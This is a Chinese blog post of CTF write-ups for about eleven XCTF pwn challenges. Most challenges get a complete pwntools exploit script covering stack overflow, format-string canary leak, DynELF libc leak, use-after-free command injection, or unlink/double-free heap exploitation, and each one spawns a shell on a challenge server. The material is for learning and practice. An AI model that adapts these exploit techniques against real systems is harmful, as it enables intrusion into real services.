攻防世界高手進(jìn)階pwn

歇了很長(zhǎng)一段時(shí)間,終于開(kāi)始了我的攻防世界pwn之路。
立一個(gè)flag:每日一題,只能多不能少。

0x00 dice_game

檢查保護(hù)


image.png

查看邏輯,這是一個(gè)猜數(shù)游戲,猜對(duì)50次就可以得到flag。
關(guān)鍵點(diǎn)就在這個(gè)隨機(jī)數(shù)種子,如果把這個(gè)種子設(shè)成0,又給了libc.so.6,那么這個(gè)隨機(jī)數(shù)就在我們的掌控那個(gè)范圍內(nèi)了。


image.png

漏洞點(diǎn)在read函數(shù),分配了0x50大小的空間,buf分配了55,這里看到buf與seed偏移為0x40。


image.png
exp:
#-*- coding:utf-8 -*-
from pwn import *
from ctypes import *
#p = process('./dice_game')
p = remote('111.198.29.45',31226)

payload = 'a'*0x40 + p64(0)

lib = cdll.LoadLibrary('libc.so.6')
p.recvuntil("Welcome, let me know your name: ")
p.sendline(payload)
a=[]
for i in range(50):
    a.append(lib.rand()%6+1)
#print(a)
for i in a:
    p.recvuntil("Give me the point(1~6): ")
    p.sendline(str(i))
p.interactive()

0x01 warmup

這里沒(méi)有源碼就很***啊,我在BUU上找到了源碼,還是假吧意思查看保護(hù)。


image.png
image.png

很明顯gets可以溢出,sub_40060D泄露system地址,然后一把梭。

exp:
#-*- coding:utf-8-*
from pwn import *
p = remote('111.198.29.45',40497)
#p = process('./warmup_csaw_2016')
padding = 0x40 + 8
sys_addr = 0x40060d
payload = 'a'*padding + p64(sys_addr) 
print payload
p.sendline(payload)
p.interactive()

0x02 forgot

檢查保護(hù)


image.png

簡(jiǎn)單看一下邏輯,一直看發(fā)現(xiàn)有點(diǎn)繞,跳到最后看到一個(gè)(*(&v3 + --v14))();,這里調(diào)用了函數(shù)返回一些字符串,又找到一個(gè)system('cat flag')的函數(shù),那么這道題就是需要覆蓋v3的地址為system的地址,就是一個(gè)got表的覆蓋吧。


image.png

這里有兩種方法覆蓋,一:在輸入name時(shí)覆蓋;二:在輸入郵箱時(shí)覆蓋。這里使用第二種,發(fā)現(xiàn)v2與v3偏移是32。
image.png
exp:
#-*-coding:utf-8-*-
from pwn import *

#p = process('./forgot')
p = remote('111.198.29.45',41636)

sys_addr = 0x80486cc

payload = 'A'* 32 + p32(sys_addr)

print p.recvuntil('> ')
p.sendline('a')
print p.recvuntil('> ')
p.sendline(payload)
print p.recv()

0x03 stack2

檢查保護(hù)


image.png

IDA分析邏輯,得知,這是一個(gè)簡(jiǎn)單的運(yùn)算器的程序,那么漏洞點(diǎn)在哪里呢?
仔細(xì)分析發(fā)現(xiàn)了這里的v13沒(méi)有檢查長(zhǎng)度??梢岳?,又看到了system('\bin\bash');
是不是很高興。OK了?


image.png

現(xiàn)在主要就是找偏移了,這里學(xué)習(xí)了其他大佬的WP復(fù)現(xiàn)的。使用IDA動(dòng)態(tài)調(diào)試。
首先在漏洞點(diǎn)下斷點(diǎn),再在程序結(jié)束后的return下斷點(diǎn)


image.png

查看EBP,得到?;稦F8FC1A8。


image.png

單步往下走,到輸入函數(shù)是輸入5,查看棧情況,往下找,找到棧頂?shù)刂窞镕F8FC22C,


image.png

這我們就找到偏移量為:hex(0xFF8FC22C-0xFF8FC1A8) = 0x84
寫了腳本還是不對(duì)。。。。萬(wàn)惡的出題人。。。
找到官方WP,得知如下。需要sh。


image.png

這里0x080848980是‘/bin/bash’, 這里是一個(gè)char型數(shù)組,那么sh就是第八個(gè)元素,command[7],所以地址應(yīng)該是0x08048987。


image.png

地址為小端序存儲(chǔ),并且是char類型,占一個(gè)字節(jié),所以按一字節(jié)分割地址,倒序發(fā)送。首先發(fā)送system地址,再發(fā)送sh地址把sh寫入棧中。

exp
#-*-coding:utf-8-*-
from pwn import *


#p = process('./stack2')
p = remote('111.198.29.45',46611)

offest = 0x84
system_plt_addr = 0x08048450
sh_addr = 0x08048980+7


def write_addr(offest,res):
    p.sendline('3')
    p.recvuntil("which number to change:")
    p.sendline(str(offest))
    p.recvuntil("new number:")
    p.sendline(str(res))
    p.recvuntil("5. exit")

p.recvuntil("How many numbers you have:")
p.sendline('1')
p.recvuntil("Give me your numbers")
p.sendline('2')
p.recvuntil("5. exit")
    
#寫入system_plt_addr
write_addr(offest,0x50)
write_addr(offest+1,0x84)
write_addr(offest+2,0x04)
write_addr(offest+3,0x08)
#寫入sh_addr
offest += 8 
write_addr(offest,0x87)
write_addr(offest+1,0x89)
write_addr(offest+2,0x04)
write_addr(offest+3,0x08)

p.sendline('5')
p.interactive()

0x04 pwn-100

這道題學(xué)到了很多東西:DynELF模塊泄露system地址,?;謴?fù) ,rop鏈 。
檢查保護(hù)


image.png

首先是尋找漏洞點(diǎn),很簡(jiǎn)單,read()造成棧溢出,偏移也容易找到為 0x40+8 。
利用思路:
無(wú)libc,system。這時(shí)就可以利用pwntools里的DynELF模塊泄露system地址,再寫入'/bin/sh' ,最后調(diào)用system。
首先找到 pop rdi ; ret ,注意:x64中,主要使用__libc_csu_init中的兩段代碼來(lái)進(jìn)行參數(shù)傳遞和函數(shù)調(diào)用,這兩段代碼分別位于0x400740和0x40075a,并且這兩段代碼執(zhí)行后會(huì)將棧移動(dòng)56字節(jié),使用后需要再填充56字節(jié)。

:~/桌面/temp/功放世界$ ROPgadget --binary pwn-100 --only "pop|ret" | grep "rdi"
0x0000000000400763 : pop rdi ; ret

再找可寫入的地址: 0x00600e10 ~ 0x00601068

gdb-peda$ vmmap
Warning: not running
Start              End                Perm  Name
0x004004c8         0x0040077d         rx-p  /home/dj/桌面/temp/功放世界/pwn-100
0x00400238         0x00400904         r--p  /home/dj/桌面/temp/功放世界/pwn-100
0x00600e10         0x00601068         rw-p  /home/dj/桌面/temp/功放世界/pwn-100

我們使用DyELF循環(huán)泄露地址,每次循環(huán)一次就調(diào)用start(就是main()函數(shù)執(zhí)行之前所作的事情)進(jìn)行棧恢復(fù)。這里有DynELF的exp模板

exp
#-*-coding:utf-8 -*-
from pwn import *

p = remote('111.198.29.45',40827)
#p = process('./pwn-100')
elf = ELF('./pwn-100')

start_addr = 0x400550
pop_rdi_ret = 0x400763

rop1 = 0x0400740
rop2 = 0x040075a
write_addr = 0x60107c #在這個(gè)范圍內(nèi)(0x00600e10 , 0x00601068)都可以

puts_addr = elf.plt['puts']
read_addr = elf.got['read']

def leak(addr):
    payload = 'a'*0x48 
    payload += p64(pop_rdi_ret) + p64(addr) + p64(puts_addr) + p64(start_addr)
    payload = payload.ljust(200,'a') 
    #循環(huán)泄露地址,payload填充為200字節(jié)。
    p.send(payload)
    p.recvuntil("bye~\n")
    
    count = 0
    up = ""
    data = ''
    while True:
        c = p.recv(numb = 1,timeout = 0.5)#等待0.5s接收輸出
        count +=1
        if up == '\n' and c == '':
            data = data[:-1]
            data += '\x00' 
            break
        else:
            data += c
        up = c
    data = data[:8]
    log.info("%#x => %s" % (addr, (data or '').encode('hex')))
    return data

#泄露system地址
d = DynELF(leak, elf=elf)
sys_addr = d.lookup('__libc_system','libc')
print 'sys_addr:',hex(sys_addr)
print "write /bin/sh to bss"

#構(gòu)造read函數(shù)payload
payload1 = 'a'*0x48 
payload1 += p64(rop2) + p64(0) + p64(1) 
payload1 + p64(read_addr) + p64(8) + p64(write_addr) + p64(0) + p64(rop1)
payload1 +=  'a' * 56 + p64(start_addr)  # 填充56字節(jié)
payload1 = payload1.ljust(200,'a')

p.send(payload1)
print p.recvuntil('bye~\n')
#寫入‘/bin/sh’
p.send("/bin/sh\x00")

#調(diào)用system()
payload2 = 'a'*0x48 + p64(pop_rdi_ret) + p64(write_addr) + p64(sys_addr) + p64(start_addr)
payload2 = payload2.ljust(200,'a')
p.send(payload2)
p.interactive()

0x05 Mary_morton

檢查保護(hù)


image.png

分析邏輯,其中一個(gè)格式化字符漏洞,一個(gè)棧溢出,還有system('cat flag')。但是程序開(kāi)啟了canary保護(hù)。紅色框出來(lái)的就是canary保護(hù),如果rax與0x28異或不等于0就運(yùn)行___stack_chk_fail,程序檢測(cè)異常直接退出。


image.png

利用思路:
通過(guò)格式化字符漏洞獲得canary值,在利用棧溢出布局棧結(jié)構(gòu)把canary放上去,繞過(guò)保護(hù)后調(diào)用system()。

OK,先分析格式化字符漏洞的偏移,buf與v2連續(xù),得到buf大小為0x90-0x8 = 0x88,由于是64位程序,在寫入?yún)?shù)是先傳入那六個(gè)寄存器(rdi,rsi,rdx,rcx,r8,r9 ),所以偏移為 0x88 / 8 + 6 = 23 字節(jié) 。


image.png

再分析棧溢出的偏移,這里不用傳參,直接就是buf的大?。?x88 。


image.png
exp
#-*- coding:utf-8 -*-
from pwn import *

p = remote('111.198.29.45',35986)
#p = process('./Mary_Morton')

sys_addr = 0x04008DA

p.recvuntil('3. Exit the battle ')
p.sendline('2')
p.sendline('%23$p') # 格式化字符串可以使用一種特殊的表示形式來(lái)指定處理第n個(gè)參數(shù)
                    # %后加輸出的第幾個(gè)值,$后加以什么形式輸出,這里需要輸出地址就使用p。
sleep(0.5)
p.recvuntil('0x')

canary = int(p.recv(16),16)
print "canary_addr  = ",hex(canary)
p.recvuntil('3. Exit the battle ')
p.sendline('1')

payload = 'a'*0x88 + p64(canary) + 'a'*8 + p64(sys_addr) #

p.sendline(payload)
p.interactive()

0x06 monkey

一臉懵逼,查看WP,直接os.system('/bin/sh') ,就得到shell了,js咱也不會(huì)啊。

0x07 time_formatter

終于做到堆題了,日常自閉。
IDA 分析,程序有五個(gè)功能

image.png

第一個(gè)函數(shù)跟進(jìn)里面有個(gè)strdup()函數(shù),strdup()說(shuō)明:返回指向被復(fù)制的字符串的指針,所需空間由malloc()分配且可以由free()釋放。這里就是通過(guò)malloc()給ptr分配空間。

image.png

還看到這里有設(shè)置輸出時(shí)間的類型,其實(shí)就是date命令的參數(shù)。

image.png

第二個(gè)貌似沒(méi)什么用,就不分析了,看到第三個(gè)函數(shù),又是通過(guò)malloc()給value分配空間。

image.png

第四個(gè)函數(shù)是對(duì)設(shè)置的時(shí)間格式輸出,我們看到我們的輸入會(huì)放到下面的system()中執(zhí)行。

image.png

第五個(gè)函數(shù)這里就有一個(gè)UAF (Use After Free)漏洞,是先f(wàn)ree()再詢問(wèn)是否真的退出。

image.png

所以我們利用這個(gè)漏洞,先調(diào)用第一個(gè)函數(shù),然后free()掉,再調(diào)用第二個(gè)函數(shù)時(shí)傳入 ';/bin/sh #\ ,這里注意命令的閉合。這里value就重用了剛剛沒(méi)有內(nèi)存回收的ptr塊。再調(diào)用第四個(gè)函數(shù)將剛剛value的值作為system()的參數(shù)。就得到了shell。

exp:
#-*-coding: utf-8-*-
from pwn import *

p = remote('111.198.29.45',43208)
#p = process('./time_formatter')

print p.recvuntil('> ')
p.sendline('1')
print p.recvuntil('Format: ')
p.sendline('%F')

print p.recvuntil('> ')
p.sendline('5')
print p.recvuntil('Are you sure you want to exit (y/N)? ')
p.sendline('N')

print p.recvuntil('> ')
p.sendline('3')
print p.recvuntil('Time zone: ')
p.sendline("';/bin/sh #")
print p.recvuntil('> ')
p.sendline('4')

p.sendline('cat flag')
print p.recv()

0x08 pwn-200

簡(jiǎn)單的棧溢出,開(kāi)啟了NX保護(hù),不能使用shellcode,無(wú)libc,所以使用DynELF模塊泄露system地址。最后需要?;謴?fù),再調(diào)用system(‘/bin/sh\00')函數(shù)得到shell。

exp:
#-*-coding:utf-8-*-
from pwn import *

p = remote('111.198.29.45',45300)
# p = process('./pwn-200')

elf = ELF('./pwn-200')
ppp_addr = 0x0804856c
start_addr = 0x080483D0
fun_addr = 0x08048484
write_plt = elf.plt['write']
read_plt = elf.plt['read']
bss_addr = elf.bss()
offest = 0x6c + 4

def leak(addr):
    payload = 'a'*offest + p32(write_plt) + p32(fun_addr) + p32(1)
    payload += p32(addr) + p32(4)
    p.send(payload)
    res = p.recv(4)
    return res
print p.recv()
d = DynELF(leak,elf = ELF('./pwn-200'))
system_addr = d.lookup('system','libc')

payload = 'a'*offest + p32(start_addr)
p.sendline(payload)
print p.recv()

payload = 'a'*offest + p32(read_plt) + p32(ppp_addr) + p32(0)
payload += p32(bss_addr) + p32(8) + p32(system_addr) + p32(fun_addr)
payload += p32(bss_addr) + '/bin/sh\00' 
p.send(payload)
p.interactive()

0x09 4-ReeHY-main-100

檢查保護(hù)


image.png

IDA分析,菜單類型的題目。查看各個(gè)功能:寫、刪除、編輯、打印(這個(gè)功能沒(méi)用),在”寫“功能里面發(fā)現(xiàn),size 和 cun 輸入是有符號(hào)數(shù),所以可以輸入負(fù)數(shù),在read時(shí)轉(zhuǎn)化成無(wú)符號(hào)數(shù)會(huì)變成很大的整數(shù),造成整型溢出。

 if ( dword_6020AC <= 4 )
  {
    puts("Input size");
    result = sub_400C55("Input size");
    LODWORD(nbytes) = result;
    if ( result <= 0x1000 )
    {
      puts("Input cun");
      result = sub_400C55("Input cun");
      v3 = result;
      if ( result <= 4 )
      {
        dest = malloc((signed int)nbytes);
        puts("Input content");
        if ( (signed int)nbytes > 0x70 )
        {
          read(0, dest, (unsigned int)nbytes);
        }
        else
        {
          read(0, &buf, (unsigned int)nbytes);
          memcpy(dest, &buf, (signed int)nbytes);
        }
        *(_DWORD *)(qword_6020C0 + 4LL * v3) = nbytes;
        *((_QWORD *)&unk_6020E0 + 2 * v3) = dest;
        dword_6020E8[4 * v3] = 1;
        ++dword_6020AC;
        result = fflush(stdout);
      }
    }
  }

再分析“刪除”功能,這里沒(méi)有判斷堆塊是否存在就free,所以可以double-free。

__int64 sub_400B21()
{
  __int64 result; // rax
  int v1; // [rsp-4h] [rbp-4h]

  puts("Chose one to dele");
  result = sub_400C55("Chose one to dele");
  v1 = result;
  if ( (signed int)result <= 4 )
  {
    free(*((void **)&unk_6020E0 + 2 * (signed int)result));
    dword_6020E8[4 * v1] = 0;
    puts("dele success!");
    result = (unsigned int)(dword_6020AC-- - 1);
  }
  return result;
}

在分析”修改“功能,這里是修改內(nèi)容,驗(yàn)證了堆塊是否存在。

int sub_400BA1()
{
  int result; // eax
  int v1; // [rsp-4h] [rbp-4h]

  puts("Chose one to edit");
  result = sub_400C55("Chose one to edit");
  v1 = result;
  if ( result <= 4 )
  {
    result = dword_6020E8[4 * result];
    if ( result == 1 )
    {
      puts("Input the content");
      read(0, *((void **)&unk_6020E0 + 2 * v1), *(unsigned int *)(4LL * v1 + qword_6020C0));
      result = puts("Edit success!");
    }
  }
  return result;
}
解題思路:

1.首先申請(qǐng)兩個(gè)堆塊0、1(這里申請(qǐng)的大小要合適,必須使用small bin后面才會(huì)unlink)。
2.然后free堆塊0、1,堆塊0做為unlink的塊,堆塊1做為free的塊。
3.申請(qǐng)一個(gè)大小為 “堆塊0加堆塊1的大小“ 的堆塊,這樣會(huì)合并剛剛free的兩個(gè)堆塊。這時(shí)需要構(gòu)造payload(具體看下面exp)欺騙系統(tǒng)堆塊0已經(jīng)被free了。
4.利用double-free,再free掉堆塊1,這樣使指針指向堆塊1的前三個(gè)字節(jié)。
5.修改堆塊0,將前三個(gè)字節(jié)覆蓋掉,然后修改為free的GOT表地址和atoi的GOT表地址(用于計(jì)算偏移)。
6.再次修改堆塊0,修改free為puts的plt地址,目的是將atoi的地址打印出來(lái)。
7.計(jì)算偏移,得到system地址,傳入‘/bin/sh‘得到shell。

(盜一下圖)

chunk0                malloc返回的ptr        chunk1        malloc返回的ptr
|                     |                     |             |
+-----------+---------+---+---+-------------+------+------+----+----+------+
|           |         |   |   |             |      |      |    |    |      |
|           |         |   |   |             | prev | size&|    |    |      |
| prev_size |size&Flag|   |   |             | size | flag |    |    |      |
|           |         |   |   |             |      |      |    |    |      |
|           |         |   |   |             |      |      |    |    |      |
+-----------+---------+---+---+-------------+------+------+----+----+------+

hunk0                malloc返回的ptr           chunk1        malloc返回的ptr
|                     |                        |             |
+-----------+---------+----+----+----+----+----+------+------+----+----+------+
|           |         |fake|fake|fake|fake| D  | fake | fake |    |    |      |
|           |         |prev|size| FD | BK | A  | prev | size&|    |    |      |
| prev_size |size&Flag|size|    |    |    | T  | size | flag |    |    |      |
|           |         |    |    |    |    | A  |      |      |    |    |      |
|           |         |    |    |    |    |    |      |      |    |    |      |
+-----------+---------+----+----+----+----+----+------+------+----+----+------+
                      |-------new_chunk0-------|

exp:

# -*- coding: utf-8 -*-  
from pwn import*
from LibcSearcher import *
context(arch = 'amd64', os = 'linux',log_level="debug") 

def Welcome():
    p.recvuntil("$ ")
    p.sendline("mutepig")
 
def Add(size,id,content):
    p.recvuntil("$ ")
    p.sendline("1")
    p.recvuntil("size\n")
    p.sendline(str(size))
    p.recvuntil("cun\n")
    p.sendline(str(id))
    p.recvuntil("content\n")
    p.sendline(content)
 
def Remove(id):
    p.recvuntil("$ ")
    p.sendline("2")
    p.recvuntil("dele\n")
    p.sendline(str(id))
 
def Edit(id,content):
    p.recvuntil("$ ")
    p.sendline("3")
    p.recvuntil("edit\n")
    p.sendline(str(id))
    p.recvuntil("content\n")
    p.send(content)

if 0:  # local
    p = process("./4-ReeHY-main")
else:
    p = remote('111.198.29.45',57450)
elf = ELF('4-ReeHY-main')
free_got = elf.got['free']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
heap_addr = 0x602100

print hex(free_got)
Welcome()
Add(512,0,"/bin/sh\x00")
Add(512,1,"11111111")
Add(512,2,"22222222")
Add(512,3,"33333333")

Remove(3)   
Remove(2)
print hex(heap_addr)

payload = p64(0) + p64(512+1) + p64(heap_addr - 0x18) + p64(heap_addr - 0x10)
payload +=  'A'*(512-0x20) + p64(512) + p64(512)

Add(1024,2,payload)
Remove(3)  #double free后,此時(shí)2的指針指向存放該指針的前3字節(jié),在棧上

Edit(2,'1'*0x18 + p64(free_got)+p64(1)+p64(atoi_got))   
#這里修改的是存放指向2和3的指針的位置,edit后,原本指向2的指針已指向got表中的free
#原本指向3的指針指向got表中atoi函數(shù)的位置,用于泄露atoi函數(shù)的地址。

Edit(2,p64(puts_plt))   #修改free為puts
Remove(3)              #相當(dāng)于puts(got[atoi])

atoi_addr=p.recv(6)
atoi_addr=atoi_addr.ljust(8,'\x00')
atoi_addr = u64(atoi_addr)
obj=LibcSearcher("atoi",atoi_addr)
base_addr = atoi_addr - obj.dump('atoi')
print "======="+hex(base_addr)

system_addr = base_addr + obj.dump('system')
Edit(2,p64(system_addr))

Remove(0)
p.interactive()

0x10 babyfenngshui

#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
p=remote('111.198.29.45',35423)
elf=ELF('./babyfengshui')
#libc = ELF('libc.so.6')
obj=LibcSearcher('free',0xf7659750)
def add_note(size,length,text):
    p.recvuntil('Action: ')
    p.sendline('0')
    p.recvuntil('size of description: ')
    p.sendline(str(size))
    p.recvuntil('name: ')
    p.sendline('AAA')
    p.recvuntil('text length: ')
    p.sendline(str(length))
    p.recvuntil('text: ')
    p.sendline(text)
def delete_note(idx):
    p.recvuntil('Action: ')
    p.sendline('1')
    p.recvuntil('index: ')
    p.sendline(str(idx))
def display_note(idx):
    p.recvuntil('Action: ')
    p.sendline('2')
    p.recvuntil('index: ')
    p.sendline(str(idx))
def update_note(idx,length,text):
    p.recvuntil('Action: ')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(idx))
    p.recvuntil('text length: ')
    p.sendline(str(length))
    p.sendlineafter('text: ',text)

add_note(0x80,0x80,'abcd')
add_note(0x80,0x80,'efgh')
add_note(0x8,0x8,'/bin/sh\00')

delete_note(0)

add_note(0x100,0x19c,'a'*0x198 + p32(elf.got['free']))
display_note(1)
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print hex(free_addr)

system_addr = free_addr - (obj.dump('free') - obj.dump('system'))
log.info("system_addr 0x%x" % system_addr)
update_note(1,0x4,p32(system_addr))

delete_note(2)

p.interactive()
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 0x00 get_shell 0x01 CGfsb 首先檢查保護(hù) nc連接輸入信息為aaaa加很多個(gè)控制字符發(fā)現(xiàn)p...
    Adam_0閱讀 8,018評(píng)論 0 30
  • 新手練習(xí) CGfsb 簡(jiǎn)單的格式化字符串 get_shell nc 上去直接 cat flag hello_pwn...
    Nevv閱讀 3,337評(píng)論 0 6
  • Lua 5.1 參考手冊(cè) by Roberto Ierusalimschy, Luiz Henrique de F...
    蘇黎九歌閱讀 14,257評(píng)論 0 38
  • 近來(lái)較忙,每次從公司出來(lái),看到那家的燈還亮著,就有一種暗自慶幸的感覺(jué)。 覺(jué)得當(dāng)初真是明智,主動(dòng)并決絕地離開(kāi),一個(gè)大...
    米思悟閱讀 108評(píng)論 0 1
  • 重啟電腦,過(guò)程中按住 command+R,進(jìn)入保護(hù)模式 打開(kāi)terminal終端,輸入 csrutil disab...
    Jniying閱讀 1,928評(píng)論 0 0

友情鏈接更多精彩內(nèi)容